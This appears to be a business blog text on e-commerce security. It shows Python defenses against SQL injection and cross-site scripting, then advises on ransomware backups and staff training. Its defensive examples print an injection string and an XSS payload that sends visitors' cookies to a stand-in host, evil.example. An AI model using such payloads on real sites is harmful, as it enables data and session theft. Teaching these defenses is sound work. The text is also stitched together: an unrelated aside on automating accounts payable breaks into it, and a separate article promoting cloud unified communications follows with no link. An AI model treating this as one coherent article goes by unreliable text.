One common form of cyber attack is SQL (Structured Query Language) injection. Essentially, criminals submit malicious SQL statements through input fields on your e-commerce site in order to extract sensitive information from your database.
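
The standard defense is to use parameterized queries rather than string concatenation. The sketch below, using Python's built-in sqlite3 module and an invented customers table, shows how the same injection payload dumps rows from the vulnerable query but matches nothing once it is bound as a parameter.

```python
# Parameterized queries vs string concatenation (illustrative table/columns).
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (email TEXT, card_last4 TEXT)")
conn.execute("INSERT INTO customers VALUES ('a@example.com', '4242')")

user_input = "anything' OR '1'='1"   # classic injection payload

# Vulnerable: the payload rewrites the WHERE clause and returns every row.
bad = conn.execute(
    f"SELECT * FROM customers WHERE email = '{user_input}'").fetchall()

# Safe: the driver treats the payload as a literal value, so nothing matches.
good = conn.execute(
    "SELECT * FROM customers WHERE email = ?", (user_input,)).fetchall()

print("vulnerable query returned:", len(bad), "rows")      # 1
print("parameterized query returned:", len(good), "rows")  # 0
```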

Another frequently used technique is cross-site scripting (XSS). In this attack, malicious script injected into your pages runs in visitors’ browsers as they load the page, allowing attackers to steal data from unwitting customers or redirect them to a malicious website.
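
The corresponding defense for cross-site scripting is to escape user-supplied content before rendering it, or to use a templating engine that escapes by default. A minimal sketch with Python's standard html module (the comment string is an invented example payload):

```python
# Escape user-supplied text so injected markup renders as inert text.
import html

comment = '<script>document.location="https://evil.example/steal?c="+document.cookie</script>'
safe = html.escape(comment)
print(safe)  # &lt;script&gt;... is displayed as text, not executed by the browser
```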

Both of these attack strategies can cause irreparable harm to your business, which only emphasizes the importance of using a trusted e-commerce platform. The good news is that because these techniques target your web platform, you can reduce the risk by implementing a web application firewall (WAF).

Secure Your Data in Case of Emergencies

Oftentimes, ransomware is injected into a business’s systems. When criminals hit your business, their main objective is to blackmail you with your own data. The ransom demanded varies with the malicious intent of the hacker, but one thing is certain: it will be costly to your business.

If you’re starting to wonder how you can afford to make these changes, consider cutting costs elsewhere in your business to free up budget. For example, consider automating your accounts payable department, which will stop you paying employees to do a task that can be handled by payment software.

Malicious breaches will also drastically diminish the trust that customers place in your business. To reduce the risk of being blackmailed with ransomware, businesses are advised to implement an effective data backup and recovery tool.

Not only will this protect you from the consequences of cybercrime, but it will also mitigate the risk of losing data during severe incidents such as natural disasters.

Stay on Top of It and Embrace Security

Unfortunately, your business can still be hacked no matter how hard you try to avoid it. Keeping your staff educated is one of the best ways to keep your business as safe as possible. The last thing you want is for your employees to start caring only after an attack has already taken place. As long as you are prepared, you may be able to stop an attack before it ruins all of your data.

Why You Should Consider Moving Unified Communications To The Cloud

In today’s evolving business landscape, executives are looking to technology to help transform their operations, enabling them to be more agile and efficient. To help achieve this, executives are increasingly incorporating cloud solutions into their business strategies to help them stay competitive. Whether it is virtualizing the data center, deploying new applications or extending network capacity, cloud solutions are becoming critical for today’s enterprise companies. With this in mind, enterprises are increasingly considering moving unified communications (UC) into the cloud as well.

Cloud services for unified communications can offer measurable value for organizations when compared to traditional PBX services. As communications equipment becomes outdated or needs to be replaced, a cloud service can look especially attractive as it can offer a host of benefits that are essential in executing a wide range of digital transformation initiatives. Outlined below are several reasons why you should consider choosing a cloud-based unified communications model as your next unified communications solution.

Cost-Effectiveness

One of the main reasons companies look to cloud solutions for their unified communications needs is the cost advantage. Today, it is very cost-effective to host a phone system over the internet because businesses are charged for the service rather than for the expensive switching equipment located on premises. This eliminates the installation and maintenance costs that a traditional phone system would require. Additionally, most cloud phone systems offer unlimited local and long-distance calling, which is also a substantial benefit for businesses looking to minimize expenses.

Ease of Use

Because of the complexity of today’s communications systems, it can sometimes take an entire IT department or a third-party vendor just to manage the upkeep of a traditional phone system. Cloud-based communications can help alleviate the burden by eliminating maintenance, IT workload, and some of the more costly internal infrastructure. Having a standardized point of contact and connectivity can streamline operations for IT teams, enabling them to focus on driving future business initiatives instead of maintaining current systems.

Quality of Service

For every business, uptime is pivotal, and reputable cloud providers build their services to deliver it. To keep operations running smoothly, businesses rely on the ability to leverage remote work teams, manage multiple office spaces, or serve customers from anywhere in the world. For businesses requiring this flexibility, cloud communications maximizes coverage through multiple data centers, helping them avoid costly interruptions and potential downtime.

Functionality

On-premise phone systems can bring challenges to an organization that is expanding quickly or has varying needs. Alternatively, cloud-based unified communications solutions can provide the flexibility and scalability that a business needs whether it is adding a new office space, moving locations, or sizing up or down now or in the future. When using cloud-based systems, businesses can access and add new features without any new hardware requirements, offering quick and easy solutions for both installing and maintaining unified communications systems.

Digital transformation and cloud solutions are revolutionizing multiple industries, and unified communications is no exception. To ensure your business is adequately prepared for a digital transformation, it is critical to begin integrating cloud-based applications into your current unified communications model. As businesses continue to evolve and adopt new technologies, remaining agile and scalable based on need is becoming increasingly important. With every business looking to keep up, offering solutions that will provide considerable business value will be beneficial now and in the future.
